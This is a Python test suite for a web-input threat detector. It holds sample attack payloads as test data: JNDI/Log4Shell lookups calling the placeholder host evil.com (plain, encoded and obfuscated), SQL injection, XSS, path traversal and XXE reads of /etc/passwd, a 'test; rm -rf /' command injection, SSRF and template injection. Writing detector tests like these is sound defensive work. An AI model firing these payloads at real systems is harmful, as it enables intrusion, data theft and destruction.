"""Tests for ``ThreatDetector``.

Each test feeds one payload to the detector and checks that a result with the
expected threat type and score is among the findings.
"""

from flask import Flask, request

from security import constants as C
from security.threat_detector import ThreatDetector


def _assert_detected(results, threat_type, score, field_name=None):
    """Assert that *results* contains a finding with the given type and score.

    Args:
        results: Iterable of findings returned by the detector; each is
            expected to expose ``threat_type`` and ``score`` (and
            ``field_name`` when *field_name* is given).
        threat_type: Threat-type constant the finding must carry.
        score: Exact score the finding must carry.
        field_name: When not ``None``, the finding must also have this
            ``field_name``.

    Raises:
        AssertionError: If no finding matches; the message lists the
            (threat_type, score) pairs that were actually reported.
    """
    results = list(results)  # allow a second pass for the failure message
    matched = any(
        (field_name is None or r.field_name == field_name)
        and r.threat_type == threat_type
        and r.score == score
        for r in results
    )
    assert matched, (
        f"expected {threat_type!r} with score {score}"
        f"{'' if field_name is None else f' on field {field_name!r}'}; "
        f"got {[(r.threat_type, r.score) for r in results]}"
    )


def test_jndi_direct_scores_100():
    """A plain ``${jndi:...}`` lookup is reported as JNDI injection, score 100."""
    detector = ThreatDetector()
    results = detector.scan_input("${jndi:ldap://evil.com/a}", "q")
    _assert_detected(results, C.THREAT_TYPE_JNDI_INJECTION, 100)


def test_jndi_encoded_scores_100():
    """A percent-encoded JNDI lookup is reported as JNDI injection, score 100."""
    detector = ThreatDetector()
    results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q")
    _assert_detected(results, C.THREAT_TYPE_JNDI_INJECTION, 100)


def test_jndi_obfuscated_scores_100():
    """A JNDI lookup spelled via ``${::-x}`` pieces is reported, score 100."""
    detector = ThreatDetector()
    payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}"
    results = detector.scan_input(payload, "q")
    _assert_detected(results, C.THREAT_TYPE_JNDI_INJECTION, 100)


def test_nested_expression_scores_80():
    """A nested ``${${...}}`` expression is reported with score 80."""
    detector = ThreatDetector()
    results = detector.scan_input("${${env:USER}}", "q")
    _assert_detected(results, C.THREAT_TYPE_NESTED_EXPRESSION, 80)


def test_sqli_union_select_scores_90():
    """A ``UNION SELECT`` payload is reported as SQL injection, score 90."""
    detector = ThreatDetector()
    results = detector.scan_input("UNION SELECT password FROM users", "q")
    _assert_detected(results, C.THREAT_TYPE_SQL_INJECTION, 90)


def test_sqli_or_1_eq_1_scores_90():
    """An ``OR 1=1`` tautology payload is reported as SQL injection, score 90."""
    detector = ThreatDetector()
    results = detector.scan_input("a' OR 1=1 --", "q")
    _assert_detected(results, C.THREAT_TYPE_SQL_INJECTION, 90)


def test_xss_scores_70():
    """A script-tag payload is reported as XSS, score 70."""
    detector = ThreatDetector()
    # NOTE(review): the payload literal was empty in the file as received
    # (markup apparently stripped), which cannot exercise XSS detection.
    # A canonical script-tag payload is used here; confirm it matches the
    # detector's XSS patterns.
    results = detector.scan_input("<script>alert(1)</script>", "q")
    _assert_detected(results, C.THREAT_TYPE_XSS, 70)


def test_path_traversal_scores_60():
    """A ``../`` traversal path is reported as path traversal, score 60."""
    detector = ThreatDetector()
    results = detector.scan_input("../../etc/passwd", "path")
    _assert_detected(results, C.THREAT_TYPE_PATH_TRAVERSAL, 60)


def test_command_injection_scores_85():
    """A ``;``-chained shell command is reported as command injection, score 85."""
    detector = ThreatDetector()
    # NOTE(review): this literal was split across a physical line break in the
    # file as received (a syntax error); it is joined as a single-line payload.
    results = detector.scan_input("test; rm -rf /", "cmd")
    _assert_detected(results, C.THREAT_TYPE_COMMAND_INJECTION, 85)


def test_ssrf_scores_75():
    """A loopback URL is reported as SSRF, score 75."""
    detector = ThreatDetector()
    results = detector.scan_input("http://127.0.0.1/admin", "url")
    _assert_detected(results, C.THREAT_TYPE_SSRF, 75)


def test_xxe_scores_85():
    """A DOCTYPE with an external entity is reported as XXE, score 85."""
    detector = ThreatDetector()
    # NOTE(review): only the trailing " ]>" of this payload survived in the
    # file as received (markup apparently stripped). The declaration below is
    # a reconstruction; confirm it matches the detector's XXE patterns.
    payload = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>"""
    results = detector.scan_input(payload, "xml")
    _assert_detected(results, C.THREAT_TYPE_XXE, 85)


def test_template_injection_scores_70():
    """A ``{{ ... }}`` expression is reported as template injection, score 70."""
    detector = ThreatDetector()
    results = detector.scan_input("Hello {{ 7*7 }}", "tpl")
    _assert_detected(results, C.THREAT_TYPE_TEMPLATE_INJECTION, 70)


def test_sensitive_path_probe_scores_40():
    """A ``/.git/config`` path is reported as a sensitive-path probe, score 40."""
    detector = ThreatDetector()
    results = detector.scan_input("/.git/config", "path")
    _assert_detected(results, C.THREAT_TYPE_SENSITIVE_PATH_PROBE, 40)


def test_scan_request_picks_up_args():
    """``scan_request`` reports a JNDI payload in query arg ``q`` as ``args.q``."""
    app = Flask(__name__)
    detector = ThreatDetector()
    # A test request context makes ``flask.request`` resolve to this URL.
    with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"):
        results = detector.scan_request(request)
    _assert_detected(
        results, C.THREAT_TYPE_JNDI_INJECTION, 100, field_name="args.q"
    )